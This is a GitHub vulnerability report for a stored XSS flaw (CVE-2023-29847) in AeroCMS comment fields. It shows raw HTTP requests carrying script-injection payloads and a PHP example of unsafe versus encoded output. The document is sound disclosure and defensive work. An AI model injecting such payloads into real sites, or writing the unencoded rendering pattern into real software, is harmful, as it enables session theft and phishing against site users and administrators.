CVE-2023-29847: Stored XSS Vulnerability on AeroCMS v0.0.1 · Issue #11 · MegaTKC/AeroCMS
AeroCMS v0.0.1 was discovered to contain multiple stored cross-site scripting (XSS) vulnerabilities via the comment_author and comment_content parameters at /post.php. These vulnerabilities allow attackers to execute arbitrary web scripts or HTML via a crafted payload.
Description:
I found a stored cross-site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section, in the “Author” and “Content” fields. When I use malicious code or any XSS payload, the browser gives me the result, because a browser cannot know whether the script should be trusted or not.
CMS Version:
v0.0.1
Affected URL:
http://127.0.0.1/AeroCMS/post.php
Steps to Reproduce:
- At first open any post.
- Then fill up the comments section; your request data will be:

```http
POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test&[email protected]&comment_content=test&create_comment=
```
- The “comment_author” and “comment_content” parameters are vulnerable. Let’s try any XSS payload in the “comment_author” and “comment_content” parameters; your request data will be:

```http
POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test"><script>alert(111)</script>&[email protected]&comment_content=test"><script>alert('XSS')</script>&create_comment=
```
- Now log in to the admin panel and go to the “Comments” menu.
- You will see the XSS pop-up (if the admin approves the comment, the XSS pop-up also executes in the post section).
Proof of Concept:
You can see the proof of concept in the screenshots and video I’ve attached to confirm the vulnerability.
Impact:
Attackers can make use of this to conduct attacks like phishing, session stealing, etc.
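The root cause described above is that the stored `comment_author` and `comment_content` values are written into the page (both the post view and the admin “Comments” list) without output encoding. The following is an added example, not AeroCMS code, showing the unsafe rendering pattern beside a hardened one that encodes every untrusted field with `htmlspecialchars` at output time; the function names, the `data-author` attribute and the sample comment array are assumptions made for the demonstration.

```php
<?php
// Added example (not AeroCMS code): unsafe vs hardened rendering of a stored
// comment. Function names and the markup layout are assumptions.

// Encode untrusted text for HTML body and double-quoted attribute contexts.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Unsafe: stored fields are concatenated straight into the markup, so the
// browser parses anything the comment author submitted as HTML/JS.
function renderCommentUnsafe(array $comment): string
{
    return '<div class="comment" data-author="' . $comment['comment_author'] . '">'
         . '<strong>' . $comment['comment_author'] . '</strong>'
         . '<p>' . $comment['comment_content'] . '</p></div>';
}

// Hardened: the same data is stored unchanged, but every field is encoded when
// it is written to the page, so the payload is displayed as text.
function renderCommentSafe(array $comment): string
{
    return '<div class="comment" data-author="' . h($comment['comment_author']) . '">'
         . '<strong>' . h($comment['comment_author']) . '</strong>'
         . '<p>' . h($comment['comment_content']) . '</p></div>';
}

// Constructed sample using the payload shape from the report above.
$comment = [
    'comment_author'  => 'test"><script>alert(111)</script>',
    'comment_content' => "test\"><script>alert('XSS')</script>",
];

echo renderCommentUnsafe($comment), PHP_EOL;
echo renderCommentSafe($comment), PHP_EOL;

// Regression check for the hardened path: no raw tag or attribute break-out
// survives encoding (< becomes &lt;, " becomes &quot;).
$safe = renderCommentSafe($comment);
if (strpos($safe, '<script>') !== false || strpos($safe, '"><') !== false) {
    fwrite(STDERR, "encoding failed\n");
    exit(1);
}
```

The same `h()` wrapper must be applied wherever the comment is displayed, including the admin moderation list, since the report shows the pop-up firing there before the comment is even approved.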
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/